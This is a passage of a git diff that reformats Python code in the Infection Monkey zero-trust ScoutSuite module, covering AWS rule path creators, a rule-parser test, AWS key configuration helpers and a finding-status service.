b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import CloudTrailRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import ( + CloudTrailRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class CloudTrailRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py index f6d4d673d..4d45c878e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import CloudWatchRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import ( + CloudWatchRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class CloudWatchRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py index 59a2e49eb..b5607cbe8 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ConfigRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ( + ConfigRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class ConfigRulePathCreator(AbstractRulePathCreator): diff --git 
a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py index 4a37b0a7e..8d951f656 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ec2_rules import EC2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class EC2RulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py index a38ae2881..4af6e351b 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elb_rules import ELBRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class ELBRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py index 2472bf076..935a8678e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elbv2_rules import ELBv2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class ELBv2RulePathCreator(AbstractRulePathCreator): diff --git 
a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py index a601cb9cd..f355dd8e2 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.iam_rules import IAMRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class IAMRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py index 0b8bf54af..be4b043d7 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rds_rules import RDSRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class RDSRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py index 4de7016a4..dfa954638 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import RedshiftRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import ( + RedshiftRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class 
RedshiftRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py index 4c0a0dccc..f06b2554f 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.s3_rules import S3Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class S3RulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py index c7cac2bce..7ded2918f 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ses_rules import SESRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class SESRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py index 60a2f5b1c..6eda4fcef 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sns_rules import SNSRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class SNSRulePathCreator(AbstractRulePathCreator): diff --git 
a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py index 619cf2ddb..e4979caf5 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sqs_rules import SQSRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class SQSRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py index 280d0933e..9daad607e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.vpc_rules import VPCRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class VPCRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py index 4dce7ed2b..8ad561ece 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py @@ -1,35 +1,63 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - cloudformation_rule_path_creator import CloudformationRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - cloudtrail_rule_path_creator import CloudTrailRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - cloudwatch_rule_path_creator import CloudWatchRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - config_rule_path_creator import ConfigRulePathCreator -from 
monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - ec2_rule_path_creator import EC2RulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - elb_rule_path_creator import ELBRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - elbv2_rule_path_creator import ELBv2RulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - iam_rule_path_creator import IAMRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - rds_rule_path_creator import RDSRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - redshift_rule_path_creator import RedshiftRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - s3_rule_path_creator import S3RulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - ses_rule_path_creator import SESRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.\ - sns_rule_path_creator import SNSRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators. \ - sqs_rule_path_creator import SQSRulePathCreator -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators. \ - vpc_rule_path_creator import VPCRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudformation_rule_path_creator import ( + CloudformationRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudtrail_rule_path_creator import ( + CloudTrailRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.cloudwatch_rule_path_creator import ( + CloudWatchRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.config_rule_path_creator import ( + ConfigRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.ec2_rule_path_creator import ( + EC2RulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.elb_rule_path_creator import ( + ELBRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.elbv2_rule_path_creator import ( + ELBv2RulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.iam_rule_path_creator import ( + IAMRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.rds_rule_path_creator import ( + RDSRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.redshift_rule_path_creator import ( + RedshiftRulePathCreator, +) +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.s3_rule_path_creator import ( + 
+    S3RulePathCreator,
+)
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.ses_rule_path_creator import (
+    SESRulePathCreator,
+)
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.sns_rule_path_creator import (
+    SNSRulePathCreator,
+)
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.sqs_rule_path_creator import (
+    SQSRulePathCreator,
+)
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.vpc_rule_path_creator import (
+    VPCRulePathCreator,
+)
-RULE_PATH_CREATORS_LIST = [EC2RulePathCreator, ELBv2RulePathCreator, RDSRulePathCreator, RedshiftRulePathCreator,
-                           S3RulePathCreator, IAMRulePathCreator, CloudTrailRulePathCreator, ELBRulePathCreator,
-                           VPCRulePathCreator, CloudWatchRulePathCreator, SQSRulePathCreator, SNSRulePathCreator,
-                           SESRulePathCreator, ConfigRulePathCreator, CloudformationRulePathCreator]
+RULE_PATH_CREATORS_LIST = [
+    EC2RulePathCreator,
+    ELBv2RulePathCreator,
+    RDSRulePathCreator,
+    RedshiftRulePathCreator,
+    S3RulePathCreator,
+    IAMRulePathCreator,
+    CloudTrailRulePathCreator,
+    ELBRulePathCreator,
+    VPCRulePathCreator,
+    CloudWatchRulePathCreator,
+    SQSRulePathCreator,
+    SNSRulePathCreator,
+    SESRulePathCreator,
+    ConfigRulePathCreator,
+    CloudformationRulePathCreator,
+]
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py
index afe14c54c..15a0b4b11 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py
@@ -10,21 +10,29 @@ from monkey_island.cc.services.zero_trust.test_common.raw_scoutsute_data import
 class ExampleRules(Enum):
-    NON_EXSISTENT_RULE = 'bogus_rule'
+    NON_EXSISTENT_RULE = "bogus_rule"
     ALL_PORTS_OPEN = EC2Rules.SECURITY_GROUP_ALL_PORTS_TO_ALL
-EXPECTED_RESULT = {'description': 'Security Group Opens All Ports to All',
-                   'path': 'ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR',
-                   'level': 'danger',
-                   'display_path': 'ec2.regions.id.vpcs.id.security_groups.id',
-                   'items': [
-                       'ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups.'
-                       'sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR'],
-                   'dashboard_name': 'Rules', 'checked_items': 179, 'flagged_items': 2, 'service': 'EC2',
-                   'rationale': 'It was detected that all ports in the security group are open <...>',
-                   'remediation': None, 'compliance': None, 'references': None}
+EXPECTED_RESULT = {
+    "description": "Security Group Opens All Ports to All",
+    "path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
+    "level": "danger",
+    "display_path": "ec2.regions.id.vpcs.id.security_groups.id",
+    "items": [
+        "ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups."
+ "sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR" + ], + "dashboard_name": "Rules", + "checked_items": 179, + "flagged_items": 2, + "service": "EC2", + "rationale": "It was detected that all ports in the security group are open <...>", + "remediation": None, + "compliance": None, + "references": None, +} def test_get_rule_data(): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py index 1f0ee180e..05bcebd03 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py @@ -15,24 +15,28 @@ def is_cloud_authentication_setup(provider: CloudProviders) -> Tuple[bool, str]: return True, "AWS keys already setup." import ScoutSuite.providers.aws.authentication_strategy as auth_strategy + try: profile = auth_strategy.AWSAuthenticationStrategy().authenticate() - return True, f" Profile \"{profile.session.profile_name}\" is already setup. " + return True, f' Profile "{profile.session.profile_name}" is already setup. ' except AuthenticationException: return False, "" def is_aws_keys_setup(): - return (ConfigService.get_config_value(AWS_KEYS_PATH + ['aws_access_key_id']) and - ConfigService.get_config_value(AWS_KEYS_PATH + ['aws_secret_access_key'])) + return ConfigService.get_config_value( + AWS_KEYS_PATH + ["aws_access_key_id"] + ) and ConfigService.get_config_value(AWS_KEYS_PATH + ["aws_secret_access_key"]) def set_aws_keys(access_key_id: str, secret_access_key: str, session_token: str): if not access_key_id or not secret_access_key: - raise InvalidAWSKeys("Missing some of the following fields: access key ID, secret access key.") - _set_aws_key('aws_access_key_id', access_key_id) - _set_aws_key('aws_secret_access_key', secret_access_key) - _set_aws_key('aws_session_token', session_token) + raise InvalidAWSKeys( + "Missing some of the following fields: access key ID, secret access key." 
+        )
-    _set_aws_key('aws_access_key_id', access_key_id)
-    _set_aws_key('aws_secret_access_key', secret_access_key)
-    _set_aws_key('aws_session_token', session_token)
+    _set_aws_key("aws_access_key_id", access_key_id)
+    _set_aws_key("aws_secret_access_key", secret_access_key)
+    _set_aws_key("aws_session_token", session_token)
 def _set_aws_key(key_type: str, key_value: str):
@@ -42,9 +46,11 @@ def _set_aws_key(key_type: str, key_value: str):
 def get_aws_keys():
-    return {'access_key_id': _get_aws_key('aws_access_key_id'),
-            'secret_access_key': _get_aws_key('aws_secret_access_key'),
-            'session_token': _get_aws_key('aws_session_token')}
+    return {
+        "access_key_id": _get_aws_key("aws_access_key_id"),
+        "secret_access_key": _get_aws_key("aws_secret_access_key"),
+        "session_token": _get_aws_key("aws_session_token"),
+    }
 def _get_aws_key(key_type: str):
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py
index 3b76194af..a97a1a2c8 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_rule_service.py
@@ -3,22 +3,21 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts import rule_consts
 class ScoutSuiteRuleService:
-
     @staticmethod
     def get_rule_from_rule_data(rule_data: dict) -> ScoutSuiteRule:
         rule = ScoutSuiteRule()
-        rule.description = rule_data['description']
-        rule.path = rule_data['path']
-        rule.level = rule_data['level']
-        rule.items = rule_data['items']
-        rule.dashboard_name = rule_data['dashboard_name']
-        rule.checked_items = rule_data['checked_items']
-        rule.flagged_items = rule_data['flagged_items']
-        rule.service = rule_data['service']
-        rule.rationale = rule_data['rationale']
-        rule.remediation = rule_data['remediation']
-        rule.compliance = rule_data['compliance']
-        rule.references = rule_data['references']
+        rule.description = rule_data["description"]
+        rule.path = rule_data["path"]
+        rule.level = rule_data["level"]
+        rule.items = rule_data["items"]
+        rule.dashboard_name = rule_data["dashboard_name"]
+        rule.checked_items = rule_data["checked_items"]
+        rule.flagged_items = rule_data["flagged_items"]
+        rule.service = rule_data["service"]
+        rule.rationale = rule_data["rationale"]
+        rule.remediation = rule_data["remediation"]
+        rule.compliance = rule_data["compliance"]
+        rule.references = rule_data["references"]
         return rule
     @staticmethod
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py
index 63befc808..3d0cf8413 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py
@@ -4,16 +4,21 @@ from common.common_consts import zero_trust_consts
 from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding
 from monkey_island.cc.models.zero_trust.scoutsuite_finding_details import ScoutSuiteFindingDetails
 from monkey_island.cc.models.zero_trust.scoutsuite_rule import ScoutSuiteRule
-from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import ScoutSuiteFindingMap
-from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ScoutSuiteRuleService
+from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import (
+    ScoutSuiteFindingMap,
+)
+from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import (
+    ScoutSuiteRuleService,
+)
 class ScoutSuiteZTFindingService:
-
     @staticmethod
     def process_rule(finding: ScoutSuiteFindingMap, rule: ScoutSuiteRule):
         existing_findings = ScoutSuiteFinding.objects(test=finding.test)
-        assert (len(existing_findings) < 2), "More than one finding exists for {}".format(finding.test)
+        assert len(existing_findings) < 2, "More than one finding exists for {}".format(
+            finding.test
+        )
         if len(existing_findings) == 0:
             ScoutSuiteZTFindingService._create_new_finding_from_rule(finding, rule)
@@ -49,17 +54,28 @@ class ScoutSuiteZTFindingService:
     def change_finding_status_by_rule(finding: ScoutSuiteFinding, rule: ScoutSuiteRule):
         rule_status = ScoutSuiteZTFindingService.get_finding_status_from_rules([rule])
         finding_status = finding.status
-        new_finding_status = ScoutSuiteZTFindingService.get_finding_status_from_rule_status(finding_status, rule_status)
+        new_finding_status = ScoutSuiteZTFindingService.get_finding_status_from_rule_status(
+            finding_status, rule_status
+        )
         if finding_status != new_finding_status:
             finding.status = new_finding_status
     @staticmethod
     def get_finding_status_from_rule_status(finding_status: str, rule_status: str) -> str:
-        if finding_status == zero_trust_consts.STATUS_FAILED or rule_status == zero_trust_consts.STATUS_FAILED:
+        if (
+            finding_status == zero_trust_consts.STATUS_FAILED
+            or rule_status == zero_trust_consts.STATUS_FAILED
+        ):
             return zero_trust_consts.STATUS_FAILED
-        elif finding_status == zero_trust_consts.STATUS_VERIFY or rule_status == zero_trust_consts.STATUS_VERIFY:
+        elif (
+            finding_status == zero_trust_consts.STATUS_VERIFY
